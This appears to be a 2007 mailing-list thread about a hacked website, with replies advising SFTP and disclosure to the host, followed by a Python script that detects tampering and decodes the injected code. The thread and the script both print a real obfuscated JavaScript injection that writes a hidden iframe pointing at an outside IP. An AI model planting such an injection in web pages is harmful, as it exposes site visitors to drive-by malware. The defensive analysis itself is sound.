[ale] I've been hacked!

James P. Kinney III jkinney at localnetsolutions.com
Wed Nov 21 07:55:24 EST 2007


Most likely it is a Windows exploit (note the iframe tag) that installs
something nasty like a bot infection or a backdoor.

I HIGHLY recommend that ftp be TURNED OFF. Use sftp (part of the ssh
tools package) instead. If the hosting provider does not support sftp,
get a new one and proclaim loudly about the insecurity of the provider.

Further, notify the hosting provider of the security breach and of your
intent to announce the breach to the security network and
Spamhaus. It is an integrity issue that the hosting providers do all
they can to ensure they are not the participants in the ongoing war of
the crap on the net. If they choose to not exercise an acceptable level
of due diligence, exercise your right to spend your hosting cash
elsewhere while also exercising your free speech rights to proclaim to
the world the facts of the situation.

If you are aware of other hosting clients on this same machine, send
them a notice with this information and the suggestion that they should
also verify their site has not been tampered with.

On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
> Last summer I received notification from Google that a web page on one 
> of my web hosting accounts was infected with some sort of malware bug. 
> 
> This account only has ftp access so I changed the password for the one 
> and only ftp account and removed the offending code from my index.html 
> file.  I also added a cron job to another site to compare a good 
> index.html with the one on the site that had been hacked in case they 
> came back.
> 
> They did.
> 
> Today I received a message that said the compare failed and found the 
> following at the top of the body in my index.html file:
> 
> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); 
> </script>
> 
> That script, unescaped looks like:
> 
> window.status='Done';document.write('<iframe name=7b73 
> src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\' 
> width=351 height=133 style=\'display: none\'></iframe>'
> 
> Has anyone seen anything like this before?  I wonder what sort of evil 
> function it might perform?
> 
> I also wonder how they got access the second time?  I went through the 
> cgi scripts on that system to be sure they were mine. There aren't any 
> php files on the system.
> 
> I attempted to look up the ip address but nslookup said it didn't exist, 
> however it pings and the index.html file from it is the default apache2 
> index file.  I suspect that system has been hacked as well.
> 
> Note the incident from last Summer was a different one.
> 
> Thanks,
> Jim.
> 
> 
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale
> 
-- 
James P. Kinney III          
CEO & Director of Engineering 
Local Net Solutions,LLC        
770-493-8244                    
http://www.localnetsolutions.com

GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics)
<jkinney at localnetsolutions.com>
Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7
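The two defensive pieces described in this thread are the decoding of the `eval(unescape("..."))` blob and the cron-job comparison of a known-good index.html against the live copy. The script below, an added example and not code from either poster, does both in one pass: it hashes the two files the way a compare job would, and when they differ it decodes any `eval(unescape(...))` payload it finds and reports the hosts loaded by hidden (`display: none`) iframes. The escaped script is the one quoted in the thread; the "known good" page and the `triage_live_copy` function name are constructed for the example.

```python
"""Triage for a tampered index.html: known-good/live comparison plus
decoding of eval(unescape("...")) payloads and extraction of hidden-iframe hosts.
Added example for this thread, not the posters' own code."""
import hashlib
import re
import urllib.parse
from typing import Dict, List

# JavaScript's unescape() decodes both %XX and %uXXXX; Python's unquote()
# only handles %XX, so the %uXXXX form is expanded first.
def js_unescape(s: str) -> str:
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return urllib.parse.unquote(s)

EVAL_UNESCAPE_RE = re.compile(r'eval\(\s*unescape\(\s*"([^"]*)"\s*\)\s*\)', re.I)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# The decoded payload is JS source that document.write()s HTML, so the
# attribute quotes may still carry their backslash escapes (src=\'...\').
SRC_RE = re.compile(r"""src\s*=\s*\\?['"]?([^\s'"\\>]+)""", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none", re.I)

def decode_obfuscated_scripts(html: str) -> List[str]:
    """Return the decoded payload of every eval(unescape("...")) call in html."""
    return [js_unescape(m.group(1)) for m in EVAL_UNESCAPE_RE.finditer(html)]

def hidden_iframe_hosts(script_src: str) -> List[str]:
    """Hosts referenced by iframes that are hidden with display:none."""
    hosts = []
    for m in IFRAME_RE.finditer(script_src):
        attrs = m.group(1)
        if not HIDDEN_RE.search(attrs):
            continue
        src = SRC_RE.search(attrs)
        if src:
            host = urllib.parse.urlparse(src.group(1)).hostname
            if host:
                hosts.append(host)
    return hosts

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def triage_live_copy(known_good: bytes, live: bytes) -> Dict[str, object]:
    """Mimic the cron-job compare: report whether the live file changed and,
    if so, which hidden-iframe hosts its obfuscated scripts pull in."""
    changed = sha256_hex(known_good) != sha256_hex(live)
    hosts: List[str] = []
    if changed:
        for payload in decode_obfuscated_scripts(live.decode("utf-8", "replace")):
            hosts.extend(hidden_iframe_hosts(payload))
    return {"changed": changed, "hidden_iframe_hosts": hosts}

# Constructed known-good page.
KNOWN_GOOD = b"<html><body><h1>Welcome</h1></body></html>\n"

# The injected block exactly as quoted in the thread, prepended to the page.
INJECTED = (
    '<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e'
    '%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65'
    '%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39'
    '%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67'
    '%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61'
    '%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20'
    '%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65'
    '%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d'
    '%65%3e%27%29")); </script>\n'
)
LIVE_TAMPERED = INJECTED.encode("utf-8") + KNOWN_GOOD

if __name__ == "__main__":
    print(triage_live_copy(KNOWN_GOOD, KNOWN_GOOD))
    print(triage_live_copy(KNOWN_GOOD, LIVE_TAMPERED))
    for payload in decode_obfuscated_scripts(LIVE_TAMPERED.decode()):
        print(payload)
```

Run against a live copy fetched over SFTP, the second report is what the cron job would mail out: the hash mismatch plus the host the hidden iframe points at, which is the indicator worth passing to the hosting provider.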